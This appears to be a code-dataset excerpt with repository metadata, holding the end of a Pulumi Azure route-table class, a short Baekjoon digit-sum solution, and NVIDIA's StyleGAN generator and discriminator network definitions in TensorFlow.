:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = VirtualHubRouteTableV2Args.__new__(VirtualHubRouteTableV2Args)
__props__.__dict__["attached_connections"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["routes"] = None
return VirtualHubRouteTableV2(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="attachedConnections")
def attached_connections(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of all connections attached to this route table v2.
"""
return pulumi.get(self, "attached_connections")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def name(self) -> pulumi.Output[Optional[str]]:
"""
The name of the resource that is unique within a resource group. This name can be used to access the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the virtual hub route table v2 resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def routes(self) -> pulumi.Output[Optional[Sequence['outputs.VirtualHubRouteV2Response']]]:
"""
List of all routes.
"""
return pulumi.get(self, "routes")
| 49.465035 | 1,661 | 0.67456 |
4a1b6fb288e5039d358dc3cd2863b49de35ca387
| 199 |
py
|
Python
|
baekjoon/python/sum_of_numbers_11720.py
|
yskang/AlgorithmPracticeWithPython
|
f7129bd1924a7961489198f0ee052d2cd1e9cf40
|
[
"MIT"
] | null | null | null |
baekjoon/python/sum_of_numbers_11720.py
|
yskang/AlgorithmPracticeWithPython
|
f7129bd1924a7961489198f0ee052d2cd1e9cf40
|
[
"MIT"
] | null | null | null |
baekjoon/python/sum_of_numbers_11720.py
|
yskang/AlgorithmPracticeWithPython
|
f7129bd1924a7961489198f0ee052d2cd1e9cf40
|
[
"MIT"
] | null | null | null |
# https://www.acmicpc.net/problem/11720
import sys
from functools import reduce
N = int(sys.stdin.readline())
print(reduce(lambda i, j: i + j, map(int, sys.stdin.readline().replace("\n", ""))))
| 33.166667 | 83 | 0.678392 |
4a1b6fbb10308cf4e8430336d2216a231a4ddc56
| 33,388 |
py
|
Python
|
converters/stylegan_official/training/networks_stylegan.py
|
ShenYujun/genforce
|
2ad04974cfaeba20b93c806531f987f06cc5c328
|
[
"MIT"
] | 827 |
2020-09-25T04:10:30.000Z
|
2022-03-23T20:20:35.000Z
|
converters/stylegan_official/training/networks_stylegan.py
|
ShenYujun/genforce
|
2ad04974cfaeba20b93c806531f987f06cc5c328
|
[
"MIT"
] | 31 |
2020-10-11T04:56:24.000Z
|
2022-02-23T15:51:30.000Z
|
converters/stylegan_official/training/networks_stylegan.py
|
ShenYujun/genforce
|
2ad04974cfaeba20b93c806531f987f06cc5c328
|
[
"MIT"
] | 68 |
2020-09-30T08:23:33.000Z
|
2022-03-12T06:33:38.000Z
|
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# This work is licensed under the Creative Commons Attribution-NonCommercial
# 4.0 International License. To view a copy of this license, visit
# http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to
# Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.
"""Network architectures used in the StyleGAN paper."""
import numpy as np
import tensorflow as tf
import dnnlib
import dnnlib.tflib as tflib
# NOTE: Do not import any application-specific modules here!
# Specify all network parameters as kwargs.
#----------------------------------------------------------------------------
# Primitive ops for manipulating 4D activation tensors.
# The gradients of these are not necessary efficient or even meaningful.
def _blur2d(x, f=[1,2,1], normalize=True, flip=False, stride=1):
assert x.shape.ndims == 4 and all(dim.value is not None for dim in x.shape[1:])
assert isinstance(stride, int) and stride >= 1
# Finalize filter kernel.
f = np.array(f, dtype=np.float32)
if f.ndim == 1:
f = f[:, np.newaxis] * f[np.newaxis, :]
assert f.ndim == 2
if normalize:
f /= np.sum(f)
if flip:
f = f[::-1, ::-1]
f = f[:, :, np.newaxis, np.newaxis]
f = np.tile(f, [1, 1, int(x.shape[1]), 1])
# No-op => early exit.
if f.shape == (1, 1) and f[0,0] == 1:
return x
# Convolve using depthwise_conv2d.
orig_dtype = x.dtype
x = tf.cast(x, tf.float32) # tf.nn.depthwise_conv2d() doesn't support fp16
f = tf.constant(f, dtype=x.dtype, name='filter')
strides = [1, 1, stride, stride]
x = tf.nn.depthwise_conv2d(x, f, strides=strides, padding='SAME', data_format='NCHW')
x = tf.cast(x, orig_dtype)
return x
def _upscale2d(x, factor=2, gain=1):
assert x.shape.ndims == 4 and all(dim.value is not None for dim in x.shape[1:])
assert isinstance(factor, int) and factor >= 1
# Apply gain.
if gain != 1:
x *= gain
# No-op => early exit.
if factor == 1:
return x
# Upscale using tf.tile().
s = x.shape
x = tf.reshape(x, [-1, s[1], s[2], 1, s[3], 1])
x = tf.tile(x, [1, 1, 1, factor, 1, factor])
x = tf.reshape(x, [-1, s[1], s[2] * factor, s[3] * factor])
return x
def _downscale2d(x, factor=2, gain=1):
assert x.shape.ndims == 4 and all(dim.value is not None for dim in x.shape[1:])
assert isinstance(factor, int) and factor >= 1
# 2x2, float32 => downscale using _blur2d().
if factor == 2 and x.dtype == tf.float32:
f = [np.sqrt(gain) / factor] * factor
return _blur2d(x, f=f, normalize=False, stride=factor)
# Apply gain.
if gain != 1:
x *= gain
# No-op => early exit.
if factor == 1:
return x
# Large factor => downscale using tf.nn.avg_pool().
# NOTE: Requires tf_config['graph_options.place_pruned_graph']=True to work.
ksize = [1, 1, factor, factor]
return tf.nn.avg_pool(x, ksize=ksize, strides=ksize, padding='VALID', data_format='NCHW')
#----------------------------------------------------------------------------
# High-level ops for manipulating 4D activation tensors.
# The gradients of these are meant to be as efficient as possible.
def blur2d(x, f=[1,2,1], normalize=True):
with tf.variable_scope('Blur2D'):
@tf.custom_gradient
def func(x):
y = _blur2d(x, f, normalize)
@tf.custom_gradient
def grad(dy):
dx = _blur2d(dy, f, normalize, flip=True)
return dx, lambda ddx: _blur2d(ddx, f, normalize)
return y, grad
return func(x)
def upscale2d(x, factor=2):
with tf.variable_scope('Upscale2D'):
@tf.custom_gradient
def func(x):
y = _upscale2d(x, factor)
@tf.custom_gradient
def grad(dy):
dx = _downscale2d(dy, factor, gain=factor**2)
return dx, lambda ddx: _upscale2d(ddx, factor)
return y, grad
return func(x)
def downscale2d(x, factor=2):
with tf.variable_scope('Downscale2D'):
@tf.custom_gradient
def func(x):
y = _downscale2d(x, factor)
@tf.custom_gradient
def grad(dy):
dx = _upscale2d(dy, factor, gain=1/factor**2)
return dx, lambda ddx: _downscale2d(ddx, factor)
return y, grad
return func(x)
#----------------------------------------------------------------------------
# Get/create weight tensor for a convolutional or fully-connected layer.
def get_weight(shape, gain=np.sqrt(2), use_wscale=False, lrmul=1):
fan_in = np.prod(shape[:-1]) # [kernel, kernel, fmaps_in, fmaps_out] or [in, out]
he_std = gain / np.sqrt(fan_in) # He init
# Equalized learning rate and custom learning rate multiplier.
if use_wscale:
init_std = 1.0 / lrmul
runtime_coef = he_std * lrmul
else:
init_std = he_std / lrmul
runtime_coef = lrmul
# Create variable.
init = tf.initializers.random_normal(0, init_std)
return tf.get_variable('weight', shape=shape, initializer=init) * runtime_coef
#----------------------------------------------------------------------------
# Fully-connected layer.
def dense(x, fmaps, **kwargs):
if len(x.shape) > 2:
x = tf.reshape(x, [-1, np.prod([d.value for d in x.shape[1:]])])
w = get_weight([x.shape[1].value, fmaps], **kwargs)
w = tf.cast(w, x.dtype)
return tf.matmul(x, w)
#----------------------------------------------------------------------------
# Convolutional layer.
def conv2d(x, fmaps, kernel, **kwargs):
assert kernel >= 1 and kernel % 2 == 1
w = get_weight([kernel, kernel, x.shape[1].value, fmaps], **kwargs)
w = tf.cast(w, x.dtype)
return tf.nn.conv2d(x, w, strides=[1,1,1,1], padding='SAME', data_format='NCHW')
#----------------------------------------------------------------------------
# Fused convolution + scaling.
# Faster and uses less memory than performing the operations separately.
def upscale2d_conv2d(x, fmaps, kernel, fused_scale='auto', **kwargs):
assert kernel >= 1 and kernel % 2 == 1
assert fused_scale in [True, False, 'auto']
if fused_scale == 'auto':
fused_scale = min(x.shape[2:]) * 2 >= 128
# Not fused => call the individual ops directly.
if not fused_scale:
return conv2d(upscale2d(x), fmaps, kernel, **kwargs)
# Fused => perform both ops simultaneously using tf.nn.conv2d_transpose().
w = get_weight([kernel, kernel, x.shape[1].value, fmaps], **kwargs)
w = tf.transpose(w, [0, 1, 3, 2]) # [kernel, kernel, fmaps_out, fmaps_in]
w = tf.pad(w, [[1,1], [1,1], [0,0], [0,0]], mode='CONSTANT')
w = tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]])
w = tf.cast(w, x.dtype)
os = [tf.shape(x)[0], fmaps, x.shape[2] * 2, x.shape[3] * 2]
return tf.nn.conv2d_transpose(x, w, os, strides=[1,1,2,2], padding='SAME', data_format='NCHW')
def conv2d_downscale2d(x, fmaps, kernel, fused_scale='auto', **kwargs):
assert kernel >= 1 and kernel % 2 == 1
assert fused_scale in [True, False, 'auto']
if fused_scale == 'auto':
fused_scale = min(x.shape[2:]) >= 128
# Not fused => call the individual ops directly.
if not fused_scale:
return downscale2d(conv2d(x, fmaps, kernel, **kwargs))
# Fused => perform both ops simultaneously using tf.nn.conv2d().
w = get_weight([kernel, kernel, x.shape[1].value, fmaps], **kwargs)
w = tf.pad(w, [[1,1], [1,1], [0,0], [0,0]], mode='CONSTANT')
w = tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]]) * 0.25
w = tf.cast(w, x.dtype)
return tf.nn.conv2d(x, w, strides=[1,1,2,2], padding='SAME', data_format='NCHW')
#----------------------------------------------------------------------------
# Apply bias to the given activation tensor.
def apply_bias(x, lrmul=1):
b = tf.get_variable('bias', shape=[x.shape[1]], initializer=tf.initializers.zeros()) * lrmul
b = tf.cast(b, x.dtype)
if len(x.shape) == 2:
return x + b
return x + tf.reshape(b, [1, -1, 1, 1])
#----------------------------------------------------------------------------
# Leaky ReLU activation. More efficient than tf.nn.leaky_relu() and supports FP16.
def leaky_relu(x, alpha=0.2):
with tf.variable_scope('LeakyReLU'):
alpha = tf.constant(alpha, dtype=x.dtype, name='alpha')
@tf.custom_gradient
def func(x):
y = tf.maximum(x, x * alpha)
@tf.custom_gradient
def grad(dy):
dx = tf.where(y >= 0, dy, dy * alpha)
return dx, lambda ddx: tf.where(y >= 0, ddx, ddx * alpha)
return y, grad
return func(x)
#----------------------------------------------------------------------------
# Pixelwise feature vector normalization.
def pixel_norm(x, epsilon=1e-8):
with tf.variable_scope('PixelNorm'):
epsilon = tf.constant(epsilon, dtype=x.dtype, name='epsilon')
return x * tf.rsqrt(tf.reduce_mean(tf.square(x), axis=1, keepdims=True) + epsilon)
#----------------------------------------------------------------------------
# Instance normalization.
def instance_norm(x, epsilon=1e-8):
assert len(x.shape) == 4 # NCHW
with tf.variable_scope('InstanceNorm'):
orig_dtype = x.dtype
x = tf.cast(x, tf.float32)
x -= tf.reduce_mean(x, axis=[2,3], keepdims=True)
epsilon = tf.constant(epsilon, dtype=x.dtype, name='epsilon')
x *= tf.rsqrt(tf.reduce_mean(tf.square(x), axis=[2,3], keepdims=True) + epsilon)
x = tf.cast(x, orig_dtype)
return x
#----------------------------------------------------------------------------
# Style modulation.
def style_mod(x, dlatent, **kwargs):
with tf.variable_scope('StyleMod'):
style = apply_bias(dense(dlatent, fmaps=x.shape[1]*2, gain=1, **kwargs))
style = tf.reshape(style, [-1, 2, x.shape[1]] + [1] * (len(x.shape) - 2))
return x * (style[:,0] + 1) + style[:,1]
#----------------------------------------------------------------------------
# Noise input.
def apply_noise(x, noise_var=None, randomize_noise=True):
assert len(x.shape) == 4 # NCHW
with tf.variable_scope('Noise'):
if noise_var is None or randomize_noise:
noise = tf.random_normal([tf.shape(x)[0], 1, x.shape[2], x.shape[3]], dtype=x.dtype)
else:
noise = tf.cast(noise_var, x.dtype)
weight = tf.get_variable('weight', shape=[x.shape[1].value], initializer=tf.initializers.zeros())
return x + noise * tf.reshape(tf.cast(weight, x.dtype), [1, -1, 1, 1])
#----------------------------------------------------------------------------
# Minibatch standard deviation.
def minibatch_stddev_layer(x, group_size=4, num_new_features=1):
with tf.variable_scope('MinibatchStddev'):
group_size = tf.minimum(group_size, tf.shape(x)[0]) # Minibatch must be divisible by (or smaller than) group_size.
s = x.shape # [NCHW] Input shape.
y = tf.reshape(x, [group_size, -1, num_new_features, s[1]//num_new_features, s[2], s[3]]) # [GMncHW] Split minibatch into M groups of size G. Split channels into n channel groups c.
y = tf.cast(y, tf.float32) # [GMncHW] Cast to FP32.
y -= tf.reduce_mean(y, axis=0, keepdims=True) # [GMncHW] Subtract mean over group.
y = tf.reduce_mean(tf.square(y), axis=0) # [MncHW] Calc variance over group.
y = tf.sqrt(y + 1e-8) # [MncHW] Calc stddev over group.
y = tf.reduce_mean(y, axis=[2,3,4], keepdims=True) # [Mn111] Take average over fmaps and pixels.
y = tf.reduce_mean(y, axis=[2]) # [Mn11] Split channels into c channel groups
y = tf.cast(y, x.dtype) # [Mn11] Cast back to original data type.
y = tf.tile(y, [group_size, 1, s[2], s[3]]) # [NnHW] Replicate over group and pixels.
return tf.concat([x, y], axis=1) # [NCHW] Append as new fmap.
#----------------------------------------------------------------------------
# Style-based generator used in the StyleGAN paper.
# Composed of two sub-networks (G_mapping and G_synthesis) that are defined below.
def G_style(
latents_in, # First input: Latent vectors (Z) [minibatch, latent_size].
labels_in, # Second input: Conditioning labels [minibatch, label_size].
truncation_psi = 0.7, # Style strength multiplier for the truncation trick. None = disable.
truncation_cutoff = 8, # Number of layers for which to apply the truncation trick. None = disable.
truncation_psi_val = None, # Value for truncation_psi to use during validation.
truncation_cutoff_val = None, # Value for truncation_cutoff to use during validation.
dlatent_avg_beta = 0.995, # Decay for tracking the moving average of W during training. None = disable.
style_mixing_prob = 0.9, # Probability of mixing styles during training. None = disable.
is_training = False, # Network is under training? Enables and disables specific features.
is_validation = False, # Network is under validation? Chooses which value to use for truncation_psi.
is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation.
components = dnnlib.EasyDict(), # Container for sub-networks. Retained between calls.
**kwargs): # Arguments for sub-networks (G_mapping and G_synthesis).
# Validate arguments.
assert not is_training or not is_validation
assert isinstance(components, dnnlib.EasyDict)
if is_validation:
truncation_psi = truncation_psi_val
truncation_cutoff = truncation_cutoff_val
if is_training or (truncation_psi is not None and not tflib.is_tf_expression(truncation_psi) and truncation_psi == 1):
truncation_psi = None
if is_training or (truncation_cutoff is not None and not tflib.is_tf_expression(truncation_cutoff) and truncation_cutoff <= 0):
truncation_cutoff = None
if not is_training or (dlatent_avg_beta is not None and not tflib.is_tf_expression(dlatent_avg_beta) and dlatent_avg_beta == 1):
dlatent_avg_beta = None
if not is_training or (style_mixing_prob is not None and not tflib.is_tf_expression(style_mixing_prob) and style_mixing_prob <= 0):
style_mixing_prob = None
# Setup components.
if 'synthesis' not in components:
components.synthesis = tflib.Network('G_synthesis', func_name=G_synthesis, **kwargs)
num_layers = components.synthesis.input_shape[1]
dlatent_size = components.synthesis.input_shape[2]
if 'mapping' not in components:
components.mapping = tflib.Network('G_mapping', func_name=G_mapping, dlatent_broadcast=num_layers, **kwargs)
# Setup variables.
lod_in = tf.get_variable('lod', initializer=np.float32(0), trainable=False)
dlatent_avg = tf.get_variable('dlatent_avg', shape=[dlatent_size], initializer=tf.initializers.zeros(), trainable=False)
# Evaluate mapping network.
dlatents = components.mapping.get_output_for(latents_in, labels_in, **kwargs)
# Update moving average of W.
if dlatent_avg_beta is not None:
with tf.variable_scope('DlatentAvg'):
batch_avg = tf.reduce_mean(dlatents[:, 0], axis=0)
update_op = tf.assign(dlatent_avg, tflib.lerp(batch_avg, dlatent_avg, dlatent_avg_beta))
with tf.control_dependencies([update_op]):
dlatents = tf.identity(dlatents)
# Perform style mixing regularization.
if style_mixing_prob is not None:
with tf.name_scope('StyleMix'):
latents2 = tf.random_normal(tf.shape(latents_in))
dlatents2 = components.mapping.get_output_for(latents2, labels_in, **kwargs)
layer_idx = np.arange(num_layers)[np.newaxis, :, np.newaxis]
cur_layers = num_layers - tf.cast(lod_in, tf.int32) * 2
mixing_cutoff = tf.cond(
tf.random_uniform([], 0.0, 1.0) < style_mixing_prob,
lambda: tf.random_uniform([], 1, cur_layers, dtype=tf.int32),
lambda: cur_layers)
dlatents = tf.where(tf.broadcast_to(layer_idx < mixing_cutoff, tf.shape(dlatents)), dlatents, dlatents2)
# Apply truncation trick.
if truncation_psi is not None and truncation_cutoff is not None:
with tf.variable_scope('Truncation'):
layer_idx = np.arange(num_layers)[np.newaxis, :, np.newaxis]
ones = np.ones(layer_idx.shape, dtype=np.float32)
coefs = tf.where(layer_idx < truncation_cutoff, truncation_psi * ones, ones)
dlatents = tflib.lerp(dlatent_avg, dlatents, coefs)
# Evaluate synthesis network.
with tf.control_dependencies([tf.assign(components.synthesis.find_var('lod'), lod_in)]):
images_out = components.synthesis.get_output_for(dlatents, force_clean_graph=is_template_graph, **kwargs)
return tf.identity(images_out, name='images_out')
#----------------------------------------------------------------------------
# Mapping network used in the StyleGAN paper.
def G_mapping(
latents_in, # First input: Latent vectors (Z) [minibatch, latent_size].
labels_in, # Second input: Conditioning labels [minibatch, label_size].
latent_size = 512, # Latent vector (Z) dimensionality.
label_size = 0, # Label dimensionality, 0 if no labels.
dlatent_size = 512, # Disentangled latent (W) dimensionality.
dlatent_broadcast = None, # Output disentangled latent (W) as [minibatch, dlatent_size] or [minibatch, dlatent_broadcast, dlatent_size].
mapping_layers = 8, # Number of mapping layers.
mapping_fmaps = 512, # Number of activations in the mapping layers.
mapping_lrmul = 0.01, # Learning rate multiplier for the mapping layers.
mapping_nonlinearity = 'lrelu', # Activation function: 'relu', 'lrelu'.
use_wscale = True, # Enable equalized learning rate?
normalize_latents = True, # Normalize latent vectors (Z) before feeding them to the mapping layers?
dtype = 'float32', # Data type to use for activations and outputs.
**_kwargs): # Ignore unrecognized keyword args.
act, gain = {'relu': (tf.nn.relu, np.sqrt(2)), 'lrelu': (leaky_relu, np.sqrt(2))}[mapping_nonlinearity]
# Inputs.
latents_in.set_shape([None, latent_size])
labels_in.set_shape([None, label_size])
latents_in = tf.cast(latents_in, dtype)
labels_in = tf.cast(labels_in, dtype)
x = latents_in
# Embed labels and concatenate them with latents.
if label_size:
with tf.variable_scope('LabelConcat'):
w = tf.get_variable('weight', shape=[label_size, latent_size], initializer=tf.initializers.random_normal())
y = tf.matmul(labels_in, tf.cast(w, dtype))
x = tf.concat([x, y], axis=1)
# Normalize latents.
if normalize_latents:
x = pixel_norm(x)
# Mapping layers.
for layer_idx in range(mapping_layers):
with tf.variable_scope('Dense%d' % layer_idx):
fmaps = dlatent_size if layer_idx == mapping_layers - 1 else mapping_fmaps
x = dense(x, fmaps=fmaps, gain=gain, use_wscale=use_wscale, lrmul=mapping_lrmul)
x = apply_bias(x, lrmul=mapping_lrmul)
x = act(x)
# Broadcast.
if dlatent_broadcast is not None:
with tf.variable_scope('Broadcast'):
x = tf.tile(x[:, np.newaxis], [1, dlatent_broadcast, 1])
# Output.
assert x.dtype == tf.as_dtype(dtype)
return tf.identity(x, name='dlatents_out')
#----------------------------------------------------------------------------
# Synthesis network used in the StyleGAN paper.
def G_synthesis(
dlatents_in, # Input: Disentangled latents (W) [minibatch, num_layers, dlatent_size].
dlatent_size = 512, # Disentangled latent (W) dimensionality.
num_channels = 3, # Number of output color channels.
resolution = 1024, # Output resolution.
fmap_base = 8192, # Overall multiplier for the number of feature maps.
fmap_decay = 1.0, # log2 feature map reduction when doubling the resolution.
fmap_max = 512, # Maximum number of feature maps in any layer.
use_styles = True, # Enable style inputs?
const_input_layer = True, # First layer is a learned constant?
use_noise = True, # Enable noise inputs?
randomize_noise = True, # True = randomize noise inputs every time (non-deterministic), False = read noise inputs from variables.
nonlinearity = 'lrelu', # Activation function: 'relu', 'lrelu'
use_wscale = True, # Enable equalized learning rate?
use_pixel_norm = False, # Enable pixelwise feature vector normalization?
use_instance_norm = True, # Enable instance normalization?
dtype = 'float32', # Data type to use for activations and outputs.
fused_scale = 'auto', # True = fused convolution + scaling, False = separate ops, 'auto' = decide automatically.
blur_filter = [1,2,1], # Low-pass filter to apply when resampling activations. None = no filtering.
structure = 'auto', # 'fixed' = no progressive growing, 'linear' = human-readable, 'recursive' = efficient, 'auto' = select automatically.
is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation.
force_clean_graph = False, # True = construct a clean graph that looks nice in TensorBoard, False = default behavior.
**_kwargs): # Ignore unrecognized keyword args.
resolution_log2 = int(np.log2(resolution))
assert resolution == 2**resolution_log2 and resolution >= 4
def nf(stage): return min(int(fmap_base / (2.0 ** (stage * fmap_decay))), fmap_max)
def blur(x): return blur2d(x, blur_filter) if blur_filter else x
if is_template_graph: force_clean_graph = True
if force_clean_graph: randomize_noise = False
if structure == 'auto': structure = 'linear' if force_clean_graph else 'recursive'
act, gain = {'relu': (tf.nn.relu, np.sqrt(2)), 'lrelu': (leaky_relu, np.sqrt(2))}[nonlinearity]
num_layers = resolution_log2 * 2 - 2
num_styles = num_layers if use_styles else 1
images_out = None
# Primary inputs.
dlatents_in.set_shape([None, num_styles, dlatent_size])
dlatents_in = tf.cast(dlatents_in, dtype)
lod_in = tf.cast(tf.get_variable('lod', initializer=np.float32(0), trainable=False), dtype)
# Noise inputs.
noise_inputs = []
if use_noise:
for layer_idx in range(num_layers):
res = layer_idx // 2 + 2
shape = [1, use_noise, 2**res, 2**res]
noise_inputs.append(tf.get_variable('noise%d' % layer_idx, shape=shape, initializer=tf.initializers.random_normal(), trainable=False))
# Things to do at the end of each layer.
def layer_epilogue(x, layer_idx):
if use_noise:
x = apply_noise(x, noise_inputs[layer_idx], randomize_noise=randomize_noise)
x = apply_bias(x)
x = act(x)
if use_pixel_norm:
x = pixel_norm(x)
if use_instance_norm:
x = instance_norm(x)
if use_styles:
x = style_mod(x, dlatents_in[:, layer_idx], use_wscale=use_wscale)
return x
# Early layers.
with tf.variable_scope('4x4'):
if const_input_layer:
with tf.variable_scope('Const'):
x = tf.get_variable('const', shape=[1, nf(1), 4, 4], initializer=tf.initializers.ones())
x = layer_epilogue(tf.tile(tf.cast(x, dtype), [tf.shape(dlatents_in)[0], 1, 1, 1]), 0)
else:
with tf.variable_scope('Dense'):
x = dense(dlatents_in[:, 0], fmaps=nf(1)*16, gain=gain/4, use_wscale=use_wscale) # tweak gain to match the official implementation of Progressing GAN
x = layer_epilogue(tf.reshape(x, [-1, nf(1), 4, 4]), 0)
with tf.variable_scope('Conv'):
x = layer_epilogue(conv2d(x, fmaps=nf(1), kernel=3, gain=gain, use_wscale=use_wscale), 1)
# Building blocks for remaining layers.
def block(res, x): # res = 3..resolution_log2
with tf.variable_scope('%dx%d' % (2**res, 2**res)):
with tf.variable_scope('Conv0_up'):
x = layer_epilogue(blur(upscale2d_conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale, fused_scale=fused_scale)), res*2-4)
with tf.variable_scope('Conv1'):
x = layer_epilogue(conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale), res*2-3)
return x
def torgb(res, x): # res = 2..resolution_log2
lod = resolution_log2 - res
with tf.variable_scope('ToRGB_lod%d' % lod):
return apply_bias(conv2d(x, fmaps=num_channels, kernel=1, gain=1, use_wscale=use_wscale))
# Fixed structure: simple and efficient, but does not support progressive growing.
if structure == 'fixed':
for res in range(3, resolution_log2 + 1):
x = block(res, x)
images_out = torgb(resolution_log2, x)
# Linear structure: simple but inefficient.
if structure == 'linear':
images_out = torgb(2, x)
for res in range(3, resolution_log2 + 1):
lod = resolution_log2 - res
x = block(res, x)
img = torgb(res, x)
images_out = upscale2d(images_out)
with tf.variable_scope('Grow_lod%d' % lod):
images_out = tflib.lerp_clip(img, images_out, lod_in - lod)
# Recursive structure: complex but efficient.
if structure == 'recursive':
def cset(cur_lambda, new_cond, new_lambda):
return lambda: tf.cond(new_cond, new_lambda, cur_lambda)
def grow(x, res, lod):
y = block(res, x)
img = lambda: upscale2d(torgb(res, y), 2**lod)
img = cset(img, (lod_in > lod), lambda: upscale2d(tflib.lerp(torgb(res, y), upscale2d(torgb(res - 1, x)), lod_in - lod), 2**lod))
if lod > 0: img = cset(img, (lod_in < lod), lambda: grow(y, res + 1, lod - 1))
return img()
images_out = grow(x, 3, resolution_log2 - 3)
assert images_out.dtype == tf.as_dtype(dtype)
return tf.identity(images_out, name='images_out')
#----------------------------------------------------------------------------
# Discriminator used in the StyleGAN paper.
def D_basic(
images_in, # First input: Images [minibatch, channel, height, width].
labels_in, # Second input: Labels [minibatch, label_size].
num_channels = 1, # Number of input color channels. Overridden based on dataset.
resolution = 32, # Input resolution. Overridden based on dataset.
label_size = 0, # Dimensionality of the labels, 0 if no labels. Overridden based on dataset.
fmap_base = 8192, # Overall multiplier for the number of feature maps.
fmap_decay = 1.0, # log2 feature map reduction when doubling the resolution.
fmap_max = 512, # Maximum number of feature maps in any layer.
nonlinearity = 'lrelu', # Activation function: 'relu', 'lrelu',
use_wscale = True, # Enable equalized learning rate?
mbstd_group_size = 4, # Group size for the minibatch standard deviation layer, 0 = disable.
mbstd_num_features = 1, # Number of features for the minibatch standard deviation layer.
dtype = 'float32', # Data type to use for activations and outputs.
fused_scale = 'auto', # True = fused convolution + scaling, False = separate ops, 'auto' = decide automatically.
blur_filter = [1,2,1], # Low-pass filter to apply when resampling activations. None = no filtering.
structure = 'auto', # 'fixed' = no progressive growing, 'linear' = human-readable, 'recursive' = efficient, 'auto' = select automatically.
is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation.
**_kwargs): # Ignore unrecognized keyword args.
resolution_log2 = int(np.log2(resolution))
assert resolution == 2**resolution_log2 and resolution >= 4
def nf(stage): return min(int(fmap_base / (2.0 ** (stage * fmap_decay))), fmap_max)
def blur(x): return blur2d(x, blur_filter) if blur_filter else x
if structure == 'auto': structure = 'linear' if is_template_graph else 'recursive'
act, gain = {'relu': (tf.nn.relu, np.sqrt(2)), 'lrelu': (leaky_relu, np.sqrt(2))}[nonlinearity]
images_in.set_shape([None, num_channels, resolution, resolution])
labels_in.set_shape([None, label_size])
images_in = tf.cast(images_in, dtype)
labels_in = tf.cast(labels_in, dtype)
lod_in = tf.cast(tf.get_variable('lod', initializer=np.float32(0.0), trainable=False), dtype)
scores_out = None
# Building blocks.
def fromrgb(x, res): # res = 2..resolution_log2
with tf.variable_scope('FromRGB_lod%d' % (resolution_log2 - res)):
return act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=1, gain=gain, use_wscale=use_wscale)))
def block(x, res): # res = 2..resolution_log2
with tf.variable_scope('%dx%d' % (2**res, 2**res)):
if res >= 3: # 8x8 and up
with tf.variable_scope('Conv0'):
x = act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale)))
with tf.variable_scope('Conv1_down'):
x = act(apply_bias(conv2d_downscale2d(blur(x), fmaps=nf(res-2), kernel=3, gain=gain, use_wscale=use_wscale, fused_scale=fused_scale)))
else: # 4x4
if mbstd_group_size > 1:
x = minibatch_stddev_layer(x, mbstd_group_size, mbstd_num_features)
with tf.variable_scope('Conv'):
x = act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale)))
with tf.variable_scope('Dense0'):
x = act(apply_bias(dense(x, fmaps=nf(res-2), gain=gain, use_wscale=use_wscale)))
with tf.variable_scope('Dense1'):
x = apply_bias(dense(x, fmaps=max(label_size, 1), gain=1, use_wscale=use_wscale))
return x
# Fixed structure: simple and efficient, but does not support progressive growing.
if structure == 'fixed':
x = fromrgb(images_in, resolution_log2)
for res in range(resolution_log2, 2, -1):
x = block(x, res)
scores_out = block(x, 2)
# Linear structure: simple but inefficient.
if structure == 'linear':
img = images_in
x = fromrgb(img, resolution_log2)
for res in range(resolution_log2, 2, -1):
lod = resolution_log2 - res
x = block(x, res)
img = downscale2d(img)
y = fromrgb(img, res - 1)
with tf.variable_scope('Grow_lod%d' % lod):
x = tflib.lerp_clip(x, y, lod_in - lod)
scores_out = block(x, 2)
# Recursive structure: complex but efficient.
if structure == 'recursive':
def cset(cur_lambda, new_cond, new_lambda):
return lambda: tf.cond(new_cond, new_lambda, cur_lambda)
def grow(res, lod):
x = lambda: fromrgb(downscale2d(images_in, 2**lod), res)
if lod > 0: x = cset(x, (lod_in < lod), lambda: grow(res + 1, lod - 1))
x = block(x(), res); y = lambda: x
if res > 2: y = cset(y, (lod_in > lod), lambda: tflib.lerp(x, fromrgb(downscale2d(images_in, 2**(lod+1)), res - 1), lod_in - lod))
return y()
scores_out = grow(2, resolution_log2 - 2)
# Label conditioning from "Which Training Methods for GANs do actually Converge?"
if label_size:
with tf.variable_scope('LabelSwitch'):
scores_out = tf.reduce_sum(scores_out * labels_in, axis=1, keepdims=True)
assert scores_out.dtype == tf.as_dtype(dtype)
scores_out = tf.identity(scores_out, name='scores_out')
return scores_out
#----------------------------------------------------------------------------
| 50.435045 | 191 | 0.591051 |
4a1b6fde85db573d81d907b69bd9ec34be3cf56a
| 6,525 |
py
|
Python
|
multimodal/graph/node-based/dataset.py
|
shubham-gupta-iitr/mmmlX
|
3485e6191e0e45bf1c8168e4e928a36ab9264d22
|
[
"Apache-2.0"
] | null | null | null |
multimodal/graph/node-based/dataset.py
|
shubham-gupta-iitr/mmmlX
|
3485e6191e0e45bf1c8168e4e928a36ab9264d22
|
